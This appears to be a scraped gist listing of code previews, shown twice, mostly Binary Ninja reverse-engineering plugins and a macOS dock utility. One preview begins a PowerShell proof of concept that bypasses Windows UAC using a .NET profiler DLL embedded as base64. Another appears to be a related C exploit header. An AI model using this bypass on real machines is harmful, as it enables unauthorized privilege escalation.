Josh Watson joshwatson

## mlil_slice.py
from binaryninja import HighlightStandardColor, PluginCommand


def do_backward_slice(instruction, function):
    # switch to SSA form (this does nothing if it's already SSA).
    instruction_queue = set([instruction.ssa_form.instr_index])
    visited_instructions = set()

    variables = set()

## UAC-dotnet-profiler-poc.ps1
# Bypass UAC with a .NET profiler DLL

# GUID, path and content
$GUID = '{' + [guid]::NewGuid() + '}'
$DllPath = $env:TEMP + "\test.dll"
$DllBytes64 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADXHurFk3+ElpN/hJaTf4SWsR+Fl5B/hJaTf4WWkX+EligejJeRf4SWKB6Gl5J/hJZSaWNok3+ElgAAAAAAAAAAUEUAAGSGAwAgMyBZAAAAAAAAAADwACIgCwIOCgACAAAABgAAAAAAAAAQAAAAEAAAAAAAgAEAAAAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAQAAAAAQAAAAAAAACAGABAAAQAAAAAAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAAAAAAAAAAAAA4CEAACgAAAAAAAAAAAAAAAAwAAAMAAAAAAAAAAAAAAAAAAAAAAAAACAgAABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAA7AAAAABAAAAACAAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAARgIAAAAgAAAABAAAAAYAAAAAAAAAAAAAAAAAAEAAAEAucGRhdGEAAAwAAAAAMAAAAAIAAAAKAAAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

## microcorruption.py
import struct
import traceback
from binaryninja import (
    BinaryView, Architecture,
    SegmentReadable, SegmentExecutable, SegmentWritable
)

class MicrocorruptionView(BinaryView):
    name = "Microcorruption"
    long_name = "Microcorruption Memory Dump"

## micocorruption_binary.py
from __future__ import print_function

from argparse import ArgumentParser
import sys

def decode_binary(input_file, output_file):
    next_addr = 0

    for line in input_file:
        addr,data = line.split(':')[:2]

## callgraph.py
import struct
import threading

import binaryninja as bn


class Graph(object):
    def __init__(self, view):
        # type: (Graph, bn.BinaryView) -> None
        self.view = view

## dock_monitor.m
// compile command:
// xcrun clang -o dock_monitor dock_monitor.m -fobjc-arc -isysroot $(xcrun --show-sdk-path) -framework Foundation -framework AppKit -Wall -Wshadow -Wextra
#import <Foundation/Foundation.h>
#import <AppKit/AppKit.h>

void changeDockPosition(CGDirectDisplayID displayID, NSString *position)
{
    // Retrieve the defaults dictionary and change the orientation key to
    // the new position
    NSUserDefaults *defaults = [NSUserDefaults standardUserDefaults];

## main.c
// Original source link https://twitter.com/hFireF0X/status/887930221466443776
// If you are here from any other link - do know that they just steal original info without giving any credit to source
// This bug has been fixed in 16273 public build.
#include "global.h"

HINSTANCE  g_hInstance;
HANDLE     g_ConOut = NULL;
BOOL       g_ConsoleOutput = FALSE;
WCHAR      g_BE = 0xFEFF;

## BNILExprVisitor.py
class BNILExprVisitor(object):
    '''A class to faciliate visiting BNIL instructions.

    The following example outputs all addition expressions that are assigned
    to an MLIL variable.

    >>> visit = BNILExprVisitor()
    >>> @visit.add(MediumLevelILOperation.MLIL_SET_VAR)
    ... def visit_set_var(expr)
    ...     visit(expr.src)

## load_pdb.py
import os
import threading

import pdbparse
from pdbparse.pe import Sections
from pdbparse.omap import Omap

import binaryninja as bn

def load_pdb_thread(bv):

## vtable-navigator.py
import struct

from binaryninja import *

def find_vtable(bv, function_il):
    for bb in function_il:
        for il in bb:
            # vtable is referenced directly
            if (il.operation == LLIL_STORE and
                il.dest.operation == LLIL_REG and
	from binaryninja import HighlightStandardColor, PluginCommand


	def do_backward_slice(instruction, function):
	# switch to SSA form (this does nothing if it's already SSA).
	instruction_queue = set([instruction.ssa_form.instr_index])
	visited_instructions = set()

	variables = set()
	# Bypass UAC with a .NET profiler DLL

	# GUID, path and content
	$GUID = '{' + [guid]::NewGuid() + '}'
	$DllPath = $env:TEMP + "\test.dll"
	$DllBytes64 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADXHurFk3+ElpN/hJaTf4SWsR+Fl5B/hJaTf4WWkX+EligejJeRf4SWKB6Gl5J/hJZSaWNok3+ElgAAAAAAAAAAUEUAAGSGAwAgMyBZAAAAAAAAAADwACIgCwIOCgACAAAABgAAAAAAAAAQAAAAEAAAAAAAgAEAAAAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAQAAAAAQAAAAAAAACAGABAAAQAAAAAAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAAAAAAAAAAAAA4CEAACgAAAAAAAAAAAAAAAAwAAAMAAAAAAAAAAAAAAAAAAAAAAAAACAgAABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAA7AAAAABAAAAACAAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAARgIAAAAgAAAABAAAAAYAAAAAAAAAAAAAAAAAAEAAAEAucGRhdGEAAAwAAAAAMAAAAAIAAAAKAAAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
	import struct
	import traceback
	from binaryninja import (
	BinaryView, Architecture,
	SegmentReadable, SegmentExecutable, SegmentWritable
	)

	class MicrocorruptionView(BinaryView):
	name = "Microcorruption"
	long_name = "Microcorruption Memory Dump"
	from __future__ import print_function

	from argparse import ArgumentParser
	import sys

	def decode_binary(input_file, output_file):
	next_addr = 0

	for line in input_file:
	addr,data = line.split(':')[:2]
	import struct
	import threading

	import binaryninja as bn


	class Graph(object):
	def __init__(self, view):
	# type: (Graph, bn.BinaryView) -> None
	self.view = view
	// compile command:
	// xcrun clang -o dock_monitor dock_monitor.m -fobjc-arc -isysroot $(xcrun --show-sdk-path) -framework Foundation -framework AppKit -Wall -Wshadow -Wextra
	#import <Foundation/Foundation.h>
	#import <AppKit/AppKit.h>

	void changeDockPosition(CGDirectDisplayID displayID, NSString *position)
	{
	// Retrieve the defaults dictionary and change the orientation key to
	// the new position
	NSUserDefaults *defaults = [NSUserDefaults standardUserDefaults];
	// Original source link https://twitter.com/hFireF0X/status/887930221466443776
	// If you are here from any other link - do know that they just steal original info without giving any credit to source
	// This bug has been fixed in 16273 public build.
	#include "global.h"

	HINSTANCE g_hInstance;
	HANDLE g_ConOut = NULL;
	BOOL g_ConsoleOutput = FALSE;
	WCHAR g_BE = 0xFEFF;
	class BNILExprVisitor(object):
	'''A class to faciliate visiting BNIL instructions.

	The following example outputs all addition expressions that are assigned
	to an MLIL variable.

	>>> visit = BNILExprVisitor()
	>>> @visit.add(MediumLevelILOperation.MLIL_SET_VAR)
	... def visit_set_var(expr)
	... visit(expr.src)
	import os
	import threading

	import pdbparse
	from pdbparse.pe import Sections
	from pdbparse.omap import Omap

	import binaryninja as bn

	def load_pdb_thread(bv):
	import struct

	from binaryninja import *

	def find_vtable(bv, function_il):
	for bb in function_il:
	for il in bb:
	# vtable is referenced directly
	if (il.operation == LLIL_STORE and
	il.dest.operation == LLIL_REG and